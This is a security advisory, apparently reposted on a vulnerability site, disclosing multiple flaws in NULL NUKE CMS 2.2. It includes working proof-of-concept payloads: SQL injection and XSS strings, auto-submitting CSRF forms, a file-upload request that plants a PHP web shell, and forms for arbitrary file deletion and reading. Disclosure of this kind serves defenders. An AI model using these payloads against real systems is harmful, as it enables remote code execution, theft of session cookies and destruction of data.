NULL NUKE CMS 2.2 CSRF / XSS / SQL Injection / Shell Upload

2014.04.29
Risk: High
Local: No
Remote: Yes
CVE: N/A

? NULL NUKE CMS v2.2 Multiple Vulnerabilities Vendor: nullwanton Product web page: http://sourceforge.net/projects/nullnuke/ Affected version: 2.2 and 2.1 rc3 Summary: NULL-8x3-NUKE is a fast, powerful and secure cross platform CMS for windows and Linux using base or full drive paths. Desc: NULL NUKE CMS suffers from multiple remote vulnerabilities including Stored/Reflected XSS, SQL Injection, Arbitrary File Upload, RCE, Arbitrary File Deletion, Arbitrary File Access using absolute path and/or traversal, Open Redirection, Parameter Traversal, and Cross-Site Request Forgery. Tested on: Apache/2.4.7 (Win32) PHP/5.5.6 MySQL 5.6.14 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2014-5185 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5185.php 13.04.2014 --- ------------------------------------- [*] SQL Injection, CSRF (msgid param) ------------------------------------- http://localhost/nullnuke/msgbox.php?nxt=readmsg&view=1&msgid=7%27 ---------------------------------------- [*] Stored XSS, CSRF (faqcattitle param) ---------------------------------------- <html><body> <form action="http://localhost/nullnuke22/admin.php?fct=faq&nxt=FaqCatAdd" method="POST"> <input type="hidden" name="faqcattitle" value='"><script>alert(document.cookie);</script>' /> <input type="submit" value="Execute!" /> </form> </body></html> ----------------------------------------------------------------------------------------- [*] Arbitrary File Upload at arbitrary location, CSRF, RCE (fupload[1], uploadpath param) ----------------------------------------------------------------------------------------- POST /nullnuke22/admin.php?fct=file_types&nxt=fileSystem&upload=here HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------117202350024276 Content-Length: 786 -----------------------------117202350024276 Content-Disposition: form-data; name="fupload[1]"; filename="shell.php" Content-Type: application/octet-stream <?php passthru($_GET['cmd']); ?> -----------------------------117202350024276 Content-Disposition: form-data; name="uploadpath" C:/xampp/htdocs/nullnuke22/ -----------------------------117202350024276 Content-Disposition: form-data; name="_numfeilds" 1 -----------------------------117202350024276 Content-Disposition: form-data; name="uploadform" Upload -----------------------------117202350024276 Content-Disposition: form-data; name="unpack_archive" 0 -----------------------------117202350024276 Content-Disposition: form-data; name="addfeild" 1 -----------------------------117202350024276-- -- <html><body> <form action="http://localhost/nullnuke22/admin.php?fct=file_types&nxt=fileSystem&upload=here" method="POST" enctype="multipart/form-data"> <input type="hidden" name="fupload[1]" value="<?php passthru($_GET['cmd']); ?>" /> <input type="hidden" name="uploadpath" value="C:/xampp/htdocs/nullnuke22/" /> <input type="hidden" name="_numfeilds" value="1" /> <input type="hidden" name="uploadform" value="Upload" /> <input type="hidden" name="unpack_archive" value="0" /> <input type="hidden" name="addfeild" value="1" /> <input type="submit" value="Execute!" /> </form> </body></html> --------------------------------------------------- [*] Arbitrary File Deletion, CSRF (dfarray[] param) --------------------------------------------------- <html><body> <form action="http://localhost/nullnuke2/admin.php?fct=file_types&nxt=fileSystem" method="POST"> <input type="hidden" name="delfile" value="Delete" /> <input type="hidden" name="dfarray[]" value="C:/secret_secrets.txt" /> <input type="submit" value="Execute!" /> </form> </body></html> ------------------------------------------------------------------------------------------- [*] Arbitrary File Read using absolute path, CSRF (file param, value needs to be in base64) ------------------------------------------------------------------------------------------- http://localhost/nullnuke22/admin.php?fct=file_types&nxt=getfile&path=&file=QzpcdGVzdC50eHQ= - QzpcdGVzdC50eHQ= (C:\test.txt) ------------------------------------------- [*] Open Redirect, CSRF (redirectlgn param) ------------------------------------------- <html><body> <form action="http://localhost/nullnuke22/login.php?nxt=chklogin" method="POST"> <input type="hidden" name="uname" value="admin" /> <input type="hidden" name="pass" value="admin" /> <input type="hidden" name="remlogin" value="0" /> <input type="hidden" name="redirectlgn" value="http://www.zeroscience.mk" /> <input type="hidden" name="stripit_form" value="uname|pass" /> <input type="hidden" name="mpn_sectype" value="1" /> <input type="submit" value="Execute!" /> </form> </body></html> ----------------------------------------------------------------- [*] Reflected XSS, CSRF (upload param, Referer HTTP Header field) ----------------------------------------------------------------- http://localhost/nullnuke22/admin.php?fct=file_types&nxt=fileSystem&upload=here1f454"><script>alert(1);</script>6747f198ae5 -- GET /nullnuke22/login.php?nxt=chklogin&uname=admin&pass=admin&remlogin=0&redirectlgn=http%3A%2F%2Flocalhost%2Fnullnuke22%2Fadmin.php%3Ffct%3Dfile_types%26nxt%3DfileSystem%26upload%3Dhere&stripit_form=uname%7Cpass&mpn_sectype=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://www.google.com/search?hl=en&q=b55ec"><script>alert(document.cookie);</script>bb8d1b11bd9304d5f Connection: keep-alive

References:

http://sourceforge.net/projects/nullnuke/
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5185.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top